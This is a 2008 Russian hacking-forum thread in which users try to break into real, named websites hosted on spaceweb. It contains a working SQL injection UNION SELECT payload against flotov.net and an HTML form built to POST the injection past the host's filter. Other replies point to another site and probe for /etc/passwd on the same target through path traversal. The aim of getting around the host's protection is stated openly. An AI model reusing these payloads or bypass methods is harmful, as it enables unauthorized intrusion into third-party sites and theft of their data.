Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
13.02.2008, 04:23
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Чёртов spaceweb
Не нащёл куда нажаловаться такчто пишу сюда 
В общем сайты которые висят на этом хостинге никак неполучается сломать, чуть что-то нетак в SQL запросе и кадает на http://2.sweb.ru/insecure  Я ваще думал что обойти никак низя, но нащёл сайт с SQL inj висящий на этом хостинге и задефейсеный  МБ другая дыра там была, но я склоняюсь к скуле... В общем вот дырко
Код:
http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()/*
если прописать from+table/* ... ну сами в общем пасмарите... Вопрос по хостингу, как обойти эту сраную фильтрацию, или как это назвать 
Возможно-ли это ваще... |
|
|
13.02.2008, 04:58
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Анти-Фильтрация или Обход фильтрации запрещенных слов в MySQL:
https://forum.antichat.ru/thread56409-sweb.html
|
|
|
|
13.02.2008, 06:59
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Ёлки, sweb... Я всё рыл на spaceweb =\
Спасибо
Последний раз редактировалось Ponchik; 13.02.2008 в 07:11..
|
|
|
|
13.02.2008, 07:00
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
это не там где только гет фильтруеЦЦо
it's my, гы твой пост не посмотрел...
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 13.02.2008 в 07:04..
|
|
|
|
13.02.2008, 07:14
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Эх! Прочитал я тему и был уверен что всё получится... А нет...
Навоял такую форму
Код:
<form method="post" action="http://www.flotov.net/log.php">
<input name="id" type="text" size="200"><br>
<input type="submit">
</form>
Взял существующий ID http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358 и вбил
Код:
bdc26a63b13ccabfd478f160e46da358
в поле, норм, сработало, тогда вбил
Код:
bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/*
не сработало, а так работает
Код:
http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/*
Пробовал пару разных вариантов, 0
[Update]
Щас подумал, мб вы имеете в виду
Код:
<form method="post" action="http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()+FROM+Users/*">
Но нет, редирект
P.S. Я звеняюсь, но я сваливаю спать, буду вечером 
Последний раз редактировалось Ponchik; 13.02.2008 в 07:25..
|
|
|
|
13.02.2008, 13:51
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://mebel.org.ua/cgi-bin/post.php
Всё нормально работает, только вот таблицы не подобрал
|
|
|
|
13.02.2008, 14:10
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.flotov.net/log.php?id=/etc/passwd
|
|
|
|
13.02.2008, 15:59
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Пилять, и в чём была моя ошибка, почему у меня не получалось?
Последний раз редактировалось Ponchik; 13.02.2008 в 16:02..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
